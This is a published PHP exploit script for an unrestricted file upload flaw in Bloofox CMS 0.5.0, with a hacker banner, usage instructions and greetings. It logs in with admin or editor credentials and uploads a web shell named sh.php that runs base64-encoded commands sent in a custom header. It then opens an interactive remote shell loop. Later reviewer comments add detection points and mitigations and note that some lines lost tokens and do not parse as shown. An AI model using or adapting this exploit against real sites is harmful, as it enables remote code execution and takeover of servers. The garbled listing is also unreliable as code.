
Bloofox CMS Unrestricted File Upload Exploit

Author: f4ry4r_red , Published: 16-09-2013

<?php

  
/*
  

 
 
                             #D:: ___    ____    ____
                            #````______/```\__//```\__/____\
                            #``_/```\_/``:```````````//____\
                            #`/|``````:``:``..``````/ f4ry4r_red \  
                            #|`|`````::`````::``````\````````/
                            #|`|`````:|`````||`````\`\______/
                            #|`|`````||`````||``````|\``/``|
                            #`\|`````||`````||``````|```/`|`\    
                            #``|`````||`````||``````|``/`/_\`\
                            #``|`___`||`___`||``````|`/``/````\
                            #```\_-_/``\_-_/`|`____`|/__/``````\
                            #````````````````_\_--_/````\`````/  
                            #```````````````/____```````````/
                            #``````````````/`````\`````````/
                            #``````````````\______\_______/

# f4ry4r_red W4s H3r3...!
 Exploit Title   : Bloofox CMS Unrestricted File Upload Exploit
 Date            : 17 June 2013
 Exploit Author  : HackFans
 Site            : hackfans.org
 Vendor Homepage : http://forums.hackfans.org/
 Software Link   : http://jaist.dl.sourceforge.net/project/bloofox/bloofoxCMS/bloofoxCMS_0.5.0.7z
 Version         : 0.5.0
 Tested on       : Windows and Linux
   
   
#####################################################
VULNERABILITY: Unrestricted File Upload 
#####################################################
   
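 This application has an upload feature that allows an authenticated user
with the Administrator or Editor role to upload arbitrary files to the media
directory. Because the upload is not restricted by file type and the stored
file can then be requested directly, an uploaded script results in remote
code execution.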
 
  
#####################################################
EXPLOIT
#####################################################
   
*/
  
// Runtime setup: PHP error output is silenced, the execution time limit is
// lifted, and a default socket timeout is configured.
// NOTE(review): several statements in this listing lost tokens when the page
// was extracted and do not parse as shown; the code is kept as published.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout"5);
  
/**
 * Sends one pre-built raw HTTP request and returns the raw reply.
 *
 * Opens a socket to the given host on port 80, writes the packet unchanged,
 * and returns whatever stream_get_contents() reads back from the socket.
 * If the socket cannot be opened the script terminates with a
 * "No response" message.
 *
 * Reviewer notes: the port is fixed at 80 and the socket is never explicitly
 * closed in this function. The returned string is the whole reply (status
 * line, headers and body together), which is why callers match on header
 * text such as "Location:" and "Set-Cookie:" directly.
 *
 * @param string $host   Target host name, taken from the command line by the callers.
 * @param string $packet Complete request text, including headers and body.
 * @return string Raw response as read from the socket.
 */
function 
http_send($host$packet)
{
    if (!(
$sock fsockopen($host80)))
        die(
"\n[-] No response from {$host}:80\n");
   
    
fputs($sock$packet);
    return 
stream_get_contents($sock);
}
 
 
   
// Usage guard: a check on $argc against 3 decides whether to print the banner
// and the expected arguments (host, path, user, password) and then exit.
// The user/password arguments reflect the advisory text: the upload feature is
// reachable only by an authenticated Administrator or Editor account, so the
// exposure depends on who holds those roles and how their credentials are protected.
// NOTE(review): the comparison operator in the condition and the terminator of
// the first banner-art string are missing from the listing as published.
if (
$argc 3)
{
print 
"\n==============================================\n";
print 
"  Bloofox CMS Unrestricted File Upload Exploit  \n";
print 
"                                              \n";
print 
"        Discovered By hackfans.org         \n";
print 
"==============================================\n\n";
print 
"                      #D:: ___    ____    ____
print "                      
#````______/```\__//```\__/____\ \n"; 
print "                      #``_/```\_/``:```````````//____\ \n";
print 
"                      #`/|``````:``:``..``````/ f4ry4r_red \ \n";   
print 
"                      #|`|`````::`````::``````\````````/ \n";
print 
"                      #|`|`````:|`````||`````\`\______/ \n";
print 
"                      #|`|`````||`````||``````|\``/``| \n";
print 
"                      #`\|`````||`````||``````|```/`|`\ \n";    
print 
"                      #``|`````||`````||``````|``/`/_\`\ \n";
print 
"                      #``|`___`||`___`||``````|`/``/````\ \n";
print 
"                      #```\_-_/``\_-_/`|`____`|/__/``````\ \n";
print 
"                      #````````````````_\_--_/````\`````/ \n";   
print 
"                      #```````````````/____```````````/ \n";
print 
"                      #``````````````/`````\`````````/ \n";
print 
"                      #``````````````\______\_______/ \n";

print 
"\nUsage......: php $argv[0] <host> <path> <user> <password>\n";
print 
"\nExample....: php $argv[0] target /bloofoxcms/ editor editor\n";
    die();
}
  
// Stage 1 - authentication.
// Host and base path come from the command line; the supplied credentials are
// posted as a urlencoded form (username, password, action=login) to
// {path}admin/index.php over HTTP/1.0 with "Connection: close".
// Log-review view: this is an ordinary admin login, so it is only
// distinguishable by context. The Referer header built here carries host and
// path without a URL scheme, which a browser-generated Referer would include.
$host $argv[1];
$path $argv[2];
 
$payload "username={$argv[3]}&password={$argv[4]}&action=login";
 
$packet  "POST {$path}admin/index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$host}{$path}admin/index.php\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
 
$response http_send($host$packet);
 
// Login is treated as successful only when the raw reply contains a redirect
// to index.php; the first Set-Cookie value (up to the first ';') is then
// captured into $sid[1] and reused as the session cookie for the upload request.
if (!
preg_match("/Location: index.php/i"$response)) die("\n[-] Login failed!\n");
if (!
preg_match("/Set-Cookie: ([^;]*);/i"$response$sid)) die("\n[-] Session ID not found!\n");
 
print 
"\n..:: Login Successful ::..\n";
print 
"\n..::   Waiting hell   ::..\n\n";
 
// Stage 2 - upload through the media manager.
// A single-part multipart/form-data body is built: form field "filename",
// file name sh.php, declared type application/octet-stream. The file content
// is a PHP one-liner that prints a ___ marker and passes the base64-decoded
// Cmd request header to passthru().
// Root cause as shown by this request: the media "new" action stores a file
// with a .php name, and the script later fetches it from media/files/ where it
// is executed. Mitigations that address it: allow-list upload extensions
// server-side (the client-declared Content-Type is attacker-controlled, as the
// octet-stream value here shows) and disable script execution for the media
// directory in the web-server configuration.
$payload  "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"filename\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";
 
// The upload goes to admin/index.php?mode=content&page=media&action=new under
// the session cookie captured at login. Detection point: a POST to this
// endpoint whose multipart filename ends in a script extension.
$packet  "POST {$path}admin/index.php?mode=content&page=media&action=new HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$host}{$path}admin/index.php?mode=content&page=media&action=new\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
      
// The reply to the upload request is discarded; success is only inferred later
// from whether the uploaded file answers with the ___ marker.
http_send($host$packet);
  
// Stage 3 - command channel over the uploaded file.
// Request template: GET {path}media/files/sh.php with a custom "Cmd" header;
// the %s placeholder is filled per iteration with the base64 encoding of the
// line read from STDIN. No session cookie is sent on these requests.
// Detection points visible in this traffic: GET requests for a .php file under
// media/files/, a non-standard Cmd request header carrying base64 text, and
// response bodies that begin with the literal ___ marker.
$packet  "GET {$path}media/files/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
      
// Interactive loop: stops when the operator types "exit". Everything after the
// ___ marker in the raw reply is printed; if the marker is absent the script
// aborts with "Exploit failed!", i.e. the uploaded file was not executed as PHP.
while(
1)
{
    print 
"\nBloofox-shell# ";
    if ((
$cmd trim(fgets(STDIN))) == "exit") break;
    
$response http_send($hostsprintf($packetbase64_encode($cmd)));
    
preg_match('/___(.*)/s'$response$m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
  
?>


################################################################################################################
Greetz : BlackErroR, X3NON ,Saman.gunner,HaCkeD,m3h2lad,Crack3R, ALI_TNP Crall of member In hackfans
################################################################################################################
